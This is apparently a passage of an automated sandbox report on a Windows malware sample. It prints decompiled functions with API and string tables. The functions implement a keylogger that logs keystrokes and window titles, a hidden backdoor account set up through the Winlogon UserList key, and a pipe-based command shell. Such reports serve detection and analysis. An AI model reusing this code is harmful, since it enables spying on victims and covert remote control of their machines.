				wsprintfW( &(_v204.pt), L"%02d-%02d-%02d_%02d.%02d.%02d", _v228.wDay & 0x0000ffff, _v228.wMonth & 0x0000ffff, _v228.wYear & 0x0000ffff, _v228.wHour & 0x0000ffff, _v228.wMinute & 0x0000ffff, _v228.wSecond & 0x0000ffff);
				_t40 =  *0x42675c; // 0x0
				lstrcatW(_t40 + 0x10,  &_v176);
				_t64 =  *0x42675c; // 0x0
				_t11 = _t64 + 0x10; // 0x10
				E00403411(_t64 + 0xc, _t71, _t11);
				_t45 =  *0x42675c; // 0x0
				_t46 = CreateFileW( *(_t45 + 0xc), 0x10000000, 1, 0, 2, 0x80, 0);
				_t66 =  *0x42675c; // 0x0
				 *(_t66 + 4) = _t46;
				CloseHandle(_t46);
				_v228.wYear = 0;
				_t68 = E004134A2("c:\\windows\\system32\\user32.dll",  &_v228);
				_t49 = E00411EF1(_t68, 0, _t90);
				_t91 = _t49;
				if(_t49 == 0) {
					_t50 =  *0x426758; // 0x0
				} else {
					_push(_t68);
					_t50 = E00411E88(_t49, "SetWindowsHookExA", _t91);
					 *0x426758 = _t50;
				}
				 *_t50(0xd, E00408125, _t60, 0);
				while(GetMessageA( &_v204, 0, 0, 0) > 0) {
					TranslateMessage( &_v204);
					DispatchMessageA( &_v204);
				}
				return 0;
			}


























                                  0x00407f94
                                  0x00407f94
                                  0x00407fa5
                                  0x00407fab
                                  0x00407fb5
                                  0x00407fbf
                                  0x00407fc5
                                  0x00407fc6
                                  0x00407fc7
                                  0x00407fcc
                                  0x00407fd1
                                  0x00407fe3
                                  0x00407fe8
                                  0x00407ff9
                                  0x00407fff
                                  0x00408013
                                  0x0040801a
                                  0x0040804e
                                  0x0040805c
                                  0x00408065
                                  0x00408067
                                  0x0040806d
                                  0x00408074
                                  0x00408079
                                  0x00408091
                                  0x00408097
                                  0x0040809e
                                  0x004080a1
                                  0x004080ab
                                  0x004080bb
                                  0x004080bd
                                  0x004080c2
                                  0x004080c4
                                  0x004080db
                                  0x004080c6
                                  0x004080c6
                                  0x004080ce
                                  0x004080d4
                                  0x004080d4
                                  0x004080e9
                                  0x0040810c
                                  0x004080fb
                                  0x00408106
                                  0x00408106
                                  0x00408122

                                  APIs
                                  • GetModuleHandleA.KERNEL32(00000000), ref: 00407FA5
                                  • SHGetFolderPathW.SHELL32(00000000,0000001C,00000000,00000000,-00000010), ref: 00407FF9
                                  • lstrcatW.KERNEL32 ref: 00408013
                                  • GetLocalTime.KERNEL32(?), ref: 0040801A
                                  • wsprintfW.USER32 ref: 0040804E
                                  • lstrcatW.KERNEL32 ref: 00408065
                                  • CreateFileW.KERNEL32(?,10000000,00000001,00000000,00000002,00000080,00000000), ref: 00408091
                                  • CloseHandle.KERNEL32(00000000), ref: 004080A1
                                    • Part of subcall function 004134A2: CreateFileA.KERNEL32(?,80000000,00000000,00000000,00000003,00000080,00000000), ref: 004134CF
                                    • Part of subcall function 004134A2: GetFileSize.KERNEL32(00000000,00000000,?,?,00000000,?,?,00415553), ref: 004134E2
                                    • Part of subcall function 004134A2: ReadFile.KERNEL32(00000000,00000000,00000000,?,00000000), ref: 004134F3
                                    • Part of subcall function 004134A2: CloseHandle.KERNEL32(00000000), ref: 00413500
                                    • Part of subcall function 00411EF1: VirtualAlloc.KERNEL32(00000000,?,00003000,00000040,00000000,7671826E,00000000,?,?,?,?,004080C2), ref: 00411F1D
                                  • GetMessageA.USER32 ref: 00408114
                                    • Part of subcall function 00411E88: lstrcmpA.KERNEL32(?,Q2A,?,open,00413251), ref: 00411EC1
                                  • TranslateMessage.USER32 ref: 004080FB
                                  • DispatchMessageA.USER32 ref: 00408106
                                  Strings
                                  • c:\windows\system32\user32.dll, xrefs: 004080AF
                                  • \Microsoft Vision\, xrefs: 0040800D
                                  • %02d-%02d-%02d_%02d.%02d.%02d, xrefs: 00408048
                                  • SetWindowsHookExA, xrefs: 004080C7
                                  Memory Dump Source
                                  • Source File: 0000000D.00000002.2123143696.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                  Yara matches
                                  Similarity
                                  • API ID: File$HandleMessage$CloseCreatelstrcat$AllocDispatchFolderLocalModulePathReadSizeTimeTranslateVirtuallstrcmpwsprintf
                                  • String ID: %02d-%02d-%02d_%02d.%02d.%02d$SetWindowsHookExA$\Microsoft Vision\$c:\windows\system32\user32.dll
                                  • API String ID: 1431388325-3884914687
                                  • Opcode ID: 093a974022d1a904e5827a257d604a30f6b30379d0845092852edf74ba7b4546
                                  • Instruction ID: 6c2511fb03697e5af89a4dd955d9eabc72836af2c0e76f94d97bcee5e6e5c3d3
                                  • Opcode Fuzzy Hash: 093a974022d1a904e5827a257d604a30f6b30379d0845092852edf74ba7b4546
                                  • Instruction Fuzzy Hash: 15418271604300ABD3209BA9EC49FAB77ECEBC8748F00486EFA45D3291DA79D945C769
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  Function 004085CB, Relevance: 24.6, APIs: 13, Strings: 1, Instructions: 147filestringCOMMON
                                  Download Yara Rule
                                  C-Code - Quality: 100%
                                  			E004085CB(void* __ecx, void* __edx, void* __eflags) {
				struct _SECURITY_ATTRIBUTES* _v8;
				void* _v12;
				void* _v16;
				short _v536;
				int _t35;
				intOrPtr _t37;
				int _t39;
				intOrPtr _t40;
				WCHAR* _t41;
				intOrPtr _t43;
				void* _t44;
				int _t46;
				intOrPtr _t48;
				intOrPtr _t50;
				long _t54;
				intOrPtr _t55;
				intOrPtr _t57;
				void* _t59;
				intOrPtr _t61;
				intOrPtr _t63;
				long _t65;
				intOrPtr _t66;
				void* _t70;
				void* _t73;
				intOrPtr _t83;
				void* _t94;
				void* _t97;
				void* _t98;
				void* _t100;

				_t94 = __edx;
				_v16 = __ecx;
				E00401052( &_v536, 0, 0x208);
				_v8 = 0;
				_t35 = GetWindowTextW(GetForegroundWindow(),  &_v536, 0x104);
				_t106 = _t35;
				if(_t35 <= 0) {
					E00403411( &_v8, _t94, L"{Unknown}");
				} else {
					_t73 = E004036F7( &_v12,  &_v536);
					E00403447(E0040357C( &_v8, _t94, _t106, "{"), _t106, _t73);
					E0040357C(_t74, _t94, _t106, "}");
					E00405FEB(_v12);
					_v12 = 0;
				}
				_t37 =  *0x42675c; // 0x0
				_t39 = lstrlenW(_t37 + 0x210);
				_t40 =  *0x42675c; // 0x0
				if(_t39 == 0) {
					L6:
					_t41 = _t40 + 0x210;
					__eflags = _t41;
					lstrcpyW(_t41, _v8);
					_t43 =  *0x42675c; // 0x0
					 *((intOrPtr*)(_t43 + 0xa10)) = 0;
				} else {
					_t70 = E0040335A( &_v8, E004036F7( &_v12, _t40 + 0x210));
					E00405FEB(_v12);
					_t40 =  *0x42675c; // 0x0
					_v12 = 0;
					if(_t70 == 0) {
						goto L6;
					} else {
						 *(_t40 + 0xa10) = 1;
					}
				}
				_t44 = CreateFileW( *(_t43 + 0xc), 4, 1, 0, 4, 0x80, 0);
				_t83 =  *0x42675c; // 0x0
				 *(_t83 + 4) = _t44;
				if( *((intOrPtr*)(_t83 + 0xa10)) == 0) {
					_t21 = _t83 + 8; // 0x8
					_t98 = L"\r\n";
					_t54 = lstrlenW(_t98);
					_t55 =  *0x42675c; // 0x0
					WriteFile( *(_t55 + 4), _t98, _t54, _t21, 0);
					_t57 =  *0x42675c; // 0x0
					_t59 = E00403373( &_v8);
					_t61 =  *0x42675c; // 0x0
					WriteFile( *(_t61 + 4), _v8, _t59 + _t59, _t57 + 8, 0);
					_t63 =  *0x42675c; // 0x0
					_t100 = L"\r\n";
					_t65 = lstrlenW(_t100);
					_t66 =  *0x42675c; // 0x0
					WriteFile( *(_t66 + 4), _t100, _t65, _t63 + 8, 0);
					_t83 =  *0x42675c; // 0x0
				}
				_t97 = _v16;
				_t28 = _t83 + 8; // 0x8
				_t46 = lstrlenW(_t97);
				_t48 =  *0x42675c; // 0x0
				WriteFile( *(_t48 + 4), _t97, _t46 + _t46, _t28, 0);
				_t50 =  *0x42675c; // 0x0
				CloseHandle( *(_t50 + 4));
				return E00405FEB(_v8);
			}
































                                  0x004085cb
                                  0x004085de
                                  0x004085e9
                                  0x004085f1
                                  0x00408607
                                  0x0040860d
                                  0x0040860f
                                  0x0040865a
                                  0x00408611
                                  0x0040861b
                                  0x00408634
                                  0x00408640
                                  0x00408648
                                  0x0040864d
                                  0x0040864d
                                  0x0040865f
                                  0x00408670
                                  0x00408674
                                  0x00408679
                                  0x004086b4
                                  0x004086b7
                                  0x004086b7
                                  0x004086bd
                                  0x004086c3
                                  0x004086c8
                                  0x0040867b
                                  0x0040868d
                                  0x00408697
                                  0x0040869c
                                  0x004086a1
                                  0x004086a6
                                  0x00000000
                                  0x004086a8
                                  0x004086a8
                                  0x004086a8
                                  0x004086a6
                                  0x004086de
                                  0x004086e4
                                  0x004086f6
                                  0x004086f9
                                  0x004086fd
                                  0x00408700
                                  0x00408707
                                  0x0040870a
                                  0x00408713
                                  0x00408715
                                  0x00408726
                                  0x0040872e
                                  0x00408737
                                  0x00408739
                                  0x0040873e
                                  0x0040874a
                                  0x0040874d
                                  0x00408756
                                  0x00408758
                                  0x00408758
                                  0x0040875e
                                  0x00408761
                                  0x00408768
                                  0x0040876d
                                  0x00408776
                                  0x00408778
                                  0x00408780
                                  0x00408792

                                  APIs
                                  • GetForegroundWindow.USER32 ref: 004085F4
                                  • GetWindowTextW.USER32 ref: 00408607
                                  • lstrlenW.KERNEL32(-00000210,{Unknown},?,?), ref: 00408670
                                  • lstrcpyW.KERNEL32(-00000210,?), ref: 004086BD
                                  • CreateFileW.KERNEL32(?,00000004,00000001,00000000,00000004,00000080,00000000), ref: 004086DE
                                  • lstrlenW.KERNEL32(00417A60,00000008,00000000,?,?), ref: 00408707
                                  • WriteFile.KERNEL32(?,00417A60,00000000,?,?), ref: 00408713
                                  • WriteFile.KERNEL32(?,?,00000000,-00000008,00000000), ref: 00408737
                                  • lstrlenW.KERNEL32(00417A60,-00000008,00000000,?,?), ref: 0040874A
                                  • WriteFile.KERNEL32(?,00417A60,00000000,?,?), ref: 00408756
                                  • lstrlenW.KERNEL32(?,00000008,00000000,?,?), ref: 00408768
                                  • WriteFile.KERNEL32(?,?,00000000,?,?), ref: 00408776
                                  • CloseHandle.KERNEL32(?), ref: 00408780
                                    • Part of subcall function 004036F7: lstrlenW.KERNEL32(00413483,00000000,?,00413483,00000000,00000000,.bss,00000000), ref: 00403700
                                    • Part of subcall function 004036F7: lstrlenW.KERNEL32(00413483,?,00413483,00000000,00000000,.bss,00000000), ref: 00403717
                                    • Part of subcall function 004036F7: lstrcpyW.KERNEL32(?,00413483), ref: 00403732
                                    • Part of subcall function 00403447: lstrcatW.KERNEL32 ref: 00403477
                                    • Part of subcall function 00405FEB: VirtualFree.KERNELBASE(?,00000000,00008000,00405D70,00000000,?,00412694,?,?,0041577A), ref: 00405FF3
                                  Strings
                                  Memory Dump Source
                                  • Source File: 0000000D.00000002.2123143696.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                  Yara matches
                                  Similarity
                                  • API ID: lstrlen$File$Write$Windowlstrcpy$CloseCreateForegroundFreeHandleTextVirtuallstrcat
                                  • String ID: {Unknown}
                                  • API String ID: 2314120260-4054869793
                                  • Opcode ID: bf71ca2cd19c38ae2d5616af0708c008d237dd3c4e3b8dbe04f20a6eaa9f76bc
                                  • Instruction ID: 21f225d70ee6afc1dcb4dd19440159f35fb949404d55de6ac3cc6466c0fc773e
                                  • Opcode Fuzzy Hash: bf71ca2cd19c38ae2d5616af0708c008d237dd3c4e3b8dbe04f20a6eaa9f76bc
                                  • Instruction Fuzzy Hash: EF515F71A40208AFC710EB55DC89FDE7BB9EF44348F0580BAB905A72A1DB759E41CB5C
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  Function 0040E29A, Relevance: 21.2, APIs: 9, Strings: 3, Instructions: 237registryCOMMON
                                  Download Yara Rule
                                  C-Code - Quality: 100%
                                  			E0040E29A(void* __edx, char _a4, char _a8) {
				void* _v12;
				char _v16;
				int _v20;
				char _v36;
				void _v44;
				void* _t51;
				int _t56;
				int _t70;
				void* _t104;
				signed int _t115;
				void* _t161;
				void* _t162;
				void* _t163;
				int _t172;

				_t161 = __edx;
				InitializeCriticalSection( &_v44);
				_t115 = 6;
				DeleteCriticalSection(memcpy(0x55ad18,  &_v44, _t115 << 2));
				EnterCriticalSection(0x55ad18);
				_t167 = _a4;
				_t111 = _a8;
				 *0x55ad7c = _a4;
				 *0x55ad70 = 0x559cc0;
				 *0x55ad6c = _a8;
				if(E0040DCBF(_t161) == 0) {
					_t51 = E00410A3C();
					__eflags = _t51 - 6;
					if(_t51 < 6) {
						L14:
						E00405044(_t167, E00404C5E( &_v36, 2, 0x55ad74, 0x55ad78));
						E00404C3B( &_v36);
						LeaveCriticalSection(0x55ad18);
						__eflags = 0;
						return 0;
					}
					_t56 = E004109ED();
					__eflags = _t56;
					if(_t56 != 0) {
						goto L14;
					}
					__eflags = E0041111B() - 1;
					if(__eflags == 0) {
						_t162 = 8;
						E00403549(0x55ad74, E004035B9( &_a4, _t162, __eflags));
						E00405FEB(_a4);
						_t163 = 8;
						E00403549(0x55ad78, E004035B9( &_a4, _t163, __eflags));
						E00405FEB(_a4);
						_t172 = 0;
						RegCreateKeyExA(0x80000002, "SOFTWARE\\Microsoft\\Windows NT\\CurrentVersion\\Winlogon\\SpecialAccounts\\UserList", 0, 0, 0, 0xf013f, 0,  &_v12,  &_v20);
						_v16 = 0;
						RegSetValueExW(_v12,  *0x55ad74, 0, 4,  &_v16, 4);
						RegCloseKey(_v12);
						_t70 = E0040D2B8(0x55ad74, 0x55ad78);
						__eflags = _t70;
						if(_t70 != 0) {
							E00412C34(_a8, _t163, E004036F7( &_a4, L"rudp"), 0x55ad74);
							E00405FEB(_a4);
							E00412C34(_a8, _t163, E004036F7( &_a8, L"rpdp"), 0x55ad78);
							E00405FEB(_a8);
							E00401F6D(0x55ad30, E0040E187, 0x55ad18);
							LeaveCriticalSection(0x55ad18);
							return 1;
						}
						E00405044(_t167, E00404C5E( &_v36, 9, 0x55ad74, 0x55ad78));
						E00404C3B( &_v36);
						L12:
						LeaveCriticalSection(0x55ad18);
						return _t172;
					}
					E00405044(_t167, E00404C5E( &_v36, 1, 0x55ad74, 0x55ad78));
					E00404C3B( &_v36);
					_t172 = 0;
					goto L12;
				}
				E00403549(0x55ad74, E00412C67(_t111, _t161,  &_a8, E004036F7( &_a4, L"rudp")));
				E00405FEB(_a8);
				_a8 = 0;
				E00405FEB(_a4);
				E00403549(0x55ad78, E00412C67(_t111, _t161,  &_a8, E004036F7( &_a4, L"rpdp")));
				E00405FEB(_a8);
				_a8 = 0;
				E00405FEB(_a4);
				if(E00403373(0x55ad74) != 0 || E00403373(0x55ad78) != 0) {
					E00405044(_t167, E00404C5E( &_v36, 8, 0x55ad74, 0x55ad78));
					E00404C3B( &_v36);
				} else {
					_t104 = E004036F7( &_a4, 0x417668);
					E00405044(_t167, E00404C5E( &_v36, 8, E004036F7( &_a8, 0x417668), _t104));
					E00404C3B( &_v36);
					E00405FEB(_a8);
					_a8 = 0;
					E00405FEB(_a4);
				}
				_t172 = 1;
				goto L12;
			}

















                                  0x0040e29a
                                  0x0040e2a7
                                  0x0040e2af
                                  0x0040e2be
                                  0x0040e2ca
                                  0x0040e2d0
                                  0x0040e2d3
                                  0x0040e2d6
                                  0x0040e2dc
                                  0x0040e2e6
                                  0x0040e2f3
                                  0x0040e3f4
                                  0x0040e3f9
                                  0x0040e3fc
                                  0x0040e56f
                                  0x0040e586
                                  0x0040e58e
                                  0x0040e594
                                  0x0040e59a
                                  0x00000000
                                  0x0040e59a
                                  0x0040e402
                                  0x0040e407
                                  0x0040e409
                                  0x00000000
                                  0x00000000
                                  0x0040e414
                                  0x0040e417
                                  0x0040e446
                                  0x0040e455
                                  0x0040e45d
                                  0x0040e464
                                  0x0040e475
                                  0x0040e47d
                                  0x0040e485
                                  0x0040e49f
                                  0x0040e4aa
                                  0x0040e4ba
                                  0x0040e4c3
                                  0x0040e4cf
                                  0x0040e4d4
                                  0x0040e4d6
                                  0x0040e523
                                  0x0040e52b
                                  0x0040e541
                                  0x0040e549
                                  0x0040e55e
                                  0x0040e564
                                  0x00000000
                                  0x0040e56c
                                  0x0040e4eb
                                  0x0040e4f3
                                  0x0040e4f8
                                  0x0040e4fe
                                  0x00000000
                                  0x0040e504
                                  0x0040e430
                                  0x0040e438
                                  0x0040e43d
                                  0x00000000
                                  0x0040e43d
                                  0x0040e318
                                  0x0040e320
                                  0x0040e32a
                                  0x0040e32d
                                  0x0040e353
                                  0x0040e35b
                                  0x0040e363
                                  0x0040e366
                                  0x0040e377
                                  0x0040e3df
                                  0x0040e3e7
                                  0x0040e384
                                  0x0040e38d
                                  0x0040e3aa
                                  0x0040e3b2
                                  0x0040e3ba
                                  0x0040e3c2
                                  0x0040e3c5
                                  0x0040e3c5
                                  0x0040e3ee
                                  0x00000000

                                  APIs
                                  • InitializeCriticalSection.KERNEL32(?,?,?), ref: 0040E2A7
                                  • DeleteCriticalSection.KERNEL32(?,?,?), ref: 0040E2BE
                                  • EnterCriticalSection.KERNEL32(0055AD18,?,?), ref: 0040E2CA
                                    • Part of subcall function 0040DCBF: RegOpenKeyExW.ADVAPI32(80000002,?,00000000,00020119,?,SYSTEM\CurrentControlSet\Services\TermService\Parameters,?,0055AD18,?,?,0040E2F1,?,?), ref: 0040DCF1
                                  • RegCreateKeyExA.ADVAPI32(80000002,SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\SpecialAccounts\UserList,00000000,00000000,00000000,000F013F,00000000,?,?,00000000,00000000,?,?), ref: 0040E49F
                                  • RegSetValueExW.ADVAPI32(?,00000000,00000004,?,00000004,?,?), ref: 0040E4BA
                                  • RegCloseKey.ADVAPI32(?,?,?), ref: 0040E4C3
                                  • LeaveCriticalSection.KERNEL32(0055AD18,00000000,0055AD74,0055AD78,?,?), ref: 0040E4FE
                                    • Part of subcall function 004036F7: lstrlenW.KERNEL32(00413483,00000000,?,00413483,00000000,00000000,.bss,00000000), ref: 00403700
                                    • Part of subcall function 004036F7: lstrlenW.KERNEL32(00413483,?,00413483,00000000,00000000,.bss,00000000), ref: 00403717
                                    • Part of subcall function 004036F7: lstrcpyW.KERNEL32(?,00413483), ref: 00403732
                                    • Part of subcall function 00403549: lstrcpyW.KERNEL32(00000000,00000000), ref: 0040356E
                                    • Part of subcall function 00405FEB: VirtualFree.KERNELBASE(?,00000000,00008000,00405D70,00000000,?,00412694,?,?,0041577A), ref: 00405FF3
                                    • Part of subcall function 00403373: lstrlenW.KERNEL32(74A313FB,00403758,?,?,?,00412AE3,?,00000000,Software\Microsoft\Windows\CurrentVersion\Explorer\,?VA,00000000,74A313FB,00000000), ref: 0040337A
                                  • LeaveCriticalSection.KERNEL32(0055AD18,00000000,rpdp,0055AD78,00000000,rudp,0055AD74,0055AD74,0055AD78,?,?), ref: 0040E564
                                  • LeaveCriticalSection.KERNEL32(0055AD18,00000000,?,?), ref: 0040E594
                                  Strings
                                  Memory Dump Source
                                  • Source File: 0000000D.00000002.2123143696.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                  Yara matches
                                  Similarity
                                  • API ID: CriticalSection$Leavelstrlen$lstrcpy$CloseCreateDeleteEnterFreeInitializeOpenValueVirtual
                                  • String ID: SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\SpecialAccounts\UserList$rpdp$rudp
                                  • API String ID: 2046459734-177601018
                                  • Opcode ID: 720f5ae610a3ef8cd572fadb057d6beb279a60b014ea6f1222e20c7c0974c690
                                  • Instruction ID: 0a479e188c8e80083ad3493b7ec29c52a1503be388f48136fafe1c7c6f2d3922
                                  • Opcode Fuzzy Hash: 720f5ae610a3ef8cd572fadb057d6beb279a60b014ea6f1222e20c7c0974c690
                                  • Instruction Fuzzy Hash: 1B7192706005187ACB05BB62CC62EEE7B78EF4431AB00453FB906B62D2DB3C5A45CA99
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  Function 0041001A, Relevance: 19.6, APIs: 13, Instructions: 135pipethreadCOMMON
                                  Download Yara Rule
                                  C-Code - Quality: 100%
                                  			E0041001A(void* __eflags, char _a4) {
				void* _v8;
				void* _v12;
				void* _v16;
				void* _v20;
				void* _v24;
				struct _SECURITY_ATTRIBUTES _v36;
				void* _t54;
				void* _t61;
				void* _t64;
				int _t66;
				void* _t76;
				int _t94;
				void* _t95;

				E0040FFA8(0x426608);
				_v12 = _v12 & 0x00000000;
				_v16 = _v16 & 0x00000000;
				_v8 = _v8 & 0x00000000;
				_t94 = 1;
				_v20 = _v20 & 0x00000000;
				_v24 = _v24 & 0x00000000;
				_v36.lpSecurityDescriptor = _v36.lpSecurityDescriptor & 0x00000000;
				_v36.nLength = 0xc;
				_v36.bInheritHandle = 1;
				if(CreatePipe( &_v12,  &_v8,  &_v36, 0) == 0) {
					L7:
					E004101AB( &_v12);
					E004101AB( &_v8);
					E004101AB( &_v16);
					E004101AB( &_v20);
					E004101AB( &_v24);
					E0040FFA8(0x426608);
					_t94 = 0;
				} else {
					_t54 = GetCurrentProcess();
					if(DuplicateHandle(GetCurrentProcess(), _v8, _t54,  &_v16, 0, 1, 2) == 0 || CreatePipe( &_v24,  &_v20,  &_v36, 0) == 0) {
						goto L7;
					} else {
						_t61 = GetCurrentProcess();
						if(DuplicateHandle(GetCurrentProcess(), _v12, _t61, 0x426610, 0, 0, 2) == 0) {
							goto L7;
						} else {
							_t64 = GetCurrentProcess();
							_t66 = DuplicateHandle(GetCurrentProcess(), _v20, _t64, 0x426614, 0, 0, 2);
							_t101 = _t66;
							if(_t66 == 0) {
								goto L7;
							} else {
								E004101AB( &_v12);
								E004101AB( &_v20);
								E0040373F(_t95,  &_a4);
								if(E0040FDB0(_t95, _t101,  &_v20, _v8, _v24, _v16) == 0) {
									goto L7;
								} else {
									E004101AB( &_v8);
									E004101AB( &_v24);
									E004101AB( &_v16);
									 *0x426618 = CreateEventA(0, 1, 0, 0);
									_t76 = CreateThread(0, 0, E0040FE49, 0x426608, 0, 0x426620);
									 *0x42661c = _t76;
									if(_t76 == 0) {
										goto L7;
									}
								}
							}
						}
					}
				}
				E00405FEB(_a4);
				return _t94;
			}
















                                  0x00410028
                                  0x0041002d
                                  0x00410034
                                  0x0041003a
                                  0x0041003e
                                  0x0041003f
                                  0x00410043
                                  0x00410047
                                  0x00410051
                                  0x0041005c
                                  0x00410068
                                  0x00410166
                                  0x00410169
                                  0x00410171
                                  0x00410179
                                  0x00410181
                                  0x00410189
                                  0x00410193
                                  0x00410198
                                  0x0041006e
                                  0x0041007d
                                  0x00410090
                                  0x00000000
                                  0x004100b2
                                  0x004100bd
                                  0x004100ca
                                  0x00000000
                                  0x004100d0
                                  0x004100db
                                  0x004100e4
                                  0x004100e6
                                  0x004100e8
                                  0x00000000
                                  0x004100ea
                                  0x004100ed
                                  0x004100f5
                                  0x0041010a
                                  0x00410116
                                  0x00000000
                                  0x00410118
                                  0x0041011b
                                  0x00410123
                                  0x0041012b
                                  0x00410152
                                  0x00410157
                                  0x0041015d
                                  0x00410164
                                  0x00000000
                                  0x00000000
                                  0x00410164
                                  0x00410116
                                  0x004100e8
                                  0x004100ca
                                  0x00410090
                                  0x0041019d
                                  0x004101a8

                                  APIs
                                    • Part of subcall function 0040FFA8: GetCurrentThreadId.KERNEL32(?,00000000,00402BC7,00000000,exit,00000000,start), ref: 0040FFB4
                                    • Part of subcall function 0040FFA8: SetEvent.KERNEL32(00000000), ref: 0040FFC8
                                    • Part of subcall function 0040FFA8: WaitForSingleObject.KERNEL32(0042661C,00001388), ref: 0040FFD5
                                    • Part of subcall function 0040FFA8: TerminateThread.KERNEL32(0042661C,000000FE), ref: 0040FFE6
                                  • CreatePipe.KERNEL32(00000000,00000000,?,00000000,?,?,00000000), ref: 00410060
                                  • GetCurrentProcess.KERNEL32(00000000,00000000,00000001,00000002,?,00000000), ref: 0041007D
                                  • GetCurrentProcess.KERNEL32(00000000,00000000,?,00000000), ref: 00410083
                                  • DuplicateHandle.KERNEL32 ref: 0041008C
                                  • CreatePipe.KERNEL32(00000000,00000000,0000000C,00000000,?,00000000), ref: 004100A4
                                  • GetCurrentProcess.KERNEL32(00426610,00000000,00000000,00000002,?,00000000), ref: 004100BD
                                  • GetCurrentProcess.KERNEL32(00000000,00000000,?,00000000), ref: 004100C3
                                  • DuplicateHandle.KERNEL32 ref: 004100C6
                                  • GetCurrentProcess.KERNEL32(00426614,00000000,00000000,00000002,?,00000000), ref: 004100DB
                                  • GetCurrentProcess.KERNEL32(00000000,00000000,?,00000000), ref: 004100E1
                                  • CreateEventA.KERNEL32(00000000,00000001,00000000,00000000,00000000,?,00000000,00000000,00000000,?,00000000), ref: 00410137
                                  • CreateThread.KERNEL32(00000000,00000000,0040FE49,00426608,00000000,00426620), ref: 00410157
                                  • DuplicateHandle.KERNEL32 ref: 004100E4
                                    • Part of subcall function 004101AB: CloseHandle.KERNEL32(00426618), ref: 004101B5
                                    • Part of subcall function 0040373F: lstrcpyW.KERNEL32(00000000,74A313FB), ref: 00403769
                                    • Part of subcall function 0040FDB0: CreateProcessW.KERNEL32(?,00000000,00000000,00000000,00000001,00000010,00000000,00000000,?,00000000), ref: 0040FE02
                                  Memory Dump Source
                                  • Source File: 0000000D.00000002.2123143696.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                  Yara matches
                                  Similarity
                                  • API ID: CurrentProcess$Create$Handle$DuplicateThread$EventPipe$CloseObjectSingleTerminateWaitlstrcpy
                                  • String ID:
                                  • API String ID: 337272696-0
                                  • Opcode ID: 476275841dcc2ec4d27dac76c17dce4c31d1fe2d653be3a7ca774bd162a6705e
                                  • Instruction ID: 45800abd4bc58874337c2637046ca9fcf03b4e80ac058ab55fe317e8ad8503fa
                                  • Opcode Fuzzy Hash: 476275841dcc2ec4d27dac76c17dce4c31d1fe2d653be3a7ca774bd162a6705e
                                  • Instruction Fuzzy Hash: B4416571A40259BBEF10EBA1DC46FEF7B78AF04704F50457AB101B21D1DBBD9A84CA68
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  Function 0040D42D, Relevance: 19.3, APIs: 10, Strings: 1, Instructions: 71serviceCOMMON
                                  Download Yara Rule
                                  C-Code - Quality: 100%
                                  			E0040D42D(struct _QUERY_SERVICE_CONFIG* _a4) {
				int _v8;
				void* __ecx;
				void* _t10;
				void* _t26;
				struct _QUERY_SERVICE_CONFIG* _t34;
				void* _t37;

				_v8 = 0;
				_t10 = OpenSCManagerW(0, L"ServicesActive", 1);
				_t37 = _t10;
				if(_t37 != 0) {
					_t26 = OpenServiceW(_t37,  *_a4, 1);
					if(_t26 != 0) {
						if(QueryServiceConfigW(_t26, 0, 0,  &_v8) != 0 || GetLastError() == 0x7a) {
							_t34 = E00406045(_v8);
							_a4 = _t34;
							if(QueryServiceConfigW(_t26, _t34, _v8,  &_v8) != 0) {
								CloseServiceHandle(_t37);
								CloseServiceHandle(_t26);
								E00401099(_a4);
								_t10 =  *(_t34 + 4);
							} else {
								goto L6;
							}
						} else {
							L6:
							CloseServiceHandle(_t37);
							CloseServiceHandle(_t26);
							goto L7;
						}
					} else {
						CloseServiceHandle(_t37);
						L7:
						_t10 = 0;
					}
				}
				return _t10;
			}









                                  0x0040d43d
                                  0x0040d440
                                  0x0040d446
                                  0x0040d44a
                                  0x0040d45f
                                  0x0040d463
                                  0x0040d47d
                                  0x0040d492
                                  0x0040d49b
                                  0x0040d4a8
                                  0x0040d4c4
                                  0x0040d4c7
                                  0x0040d4cc
                                  0x0040d4d2
                                  0x00000000
                                  0x00000000
                                  0x00000000
                                  0x0040d4aa
                                  0x0040d4aa
                                  0x0040d4b1
                                  0x0040d4b4
                                  0x00000000
                                  0x0040d4b4
                                  0x0040d465
                                  0x0040d466
                                  0x0040d4b6
                                  0x0040d4b6
                                  0x0040d4b6
                                  0x0040d4d4
                                  0x0040d4d8

                                  APIs
                                  • OpenSCManagerW.ADVAPI32(00000000,ServicesActive,00000001), ref: 0040D440
                                  • OpenServiceW.ADVAPI32(00000000,?,00000001), ref: 0040D459
                                  • CloseServiceHandle.ADVAPI32(00000000), ref: 0040D466
                                  • QueryServiceConfigW.ADVAPI32(00000000,00000000,00000000,?), ref: 0040D475
                                  • GetLastError.KERNEL32 ref: 0040D47F
                                  • QueryServiceConfigW.ADVAPI32(00000000,00000000,?,?), ref: 0040D4A0
                                  • CloseServiceHandle.ADVAPI32(00000000), ref: 0040D4B1
                                  • CloseServiceHandle.ADVAPI32(00000000), ref: 0040D4B4
                                  • CloseServiceHandle.ADVAPI32(00000000), ref: 0040D4C4
                                  • CloseServiceHandle.ADVAPI32(00000000), ref: 0040D4C7
                                    • Part of subcall function 00401099: GetProcessHeap.KERNEL32(00000000,00000000,00413499,00000000,00000000,00000000,00000000,.bss,00000000), ref: 0040109F
                                    • Part of subcall function 00401099: HeapFree.KERNEL32(00000000), ref: 004010A6
                                  Strings
                                  Memory Dump Source
                                  • Source File: 0000000D.00000002.2123143696.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                  Yara matches
                                  Similarity
                                  • API ID: Service$CloseHandle$ConfigHeapOpenQuery$ErrorFreeLastManagerProcess
                                  • String ID: ServicesActive
                                  • API String ID: 1929760286-3071072050
                                  • Opcode ID: cd1e18646101d5c1bab72bb6f7b1f33bedb6a16cea768a9159eaaec8da9406aa
                                  • Instruction ID: 77105f180dc1f4f583609010b4a2cd32bd7f1b8692fb86ee244d35c389544786
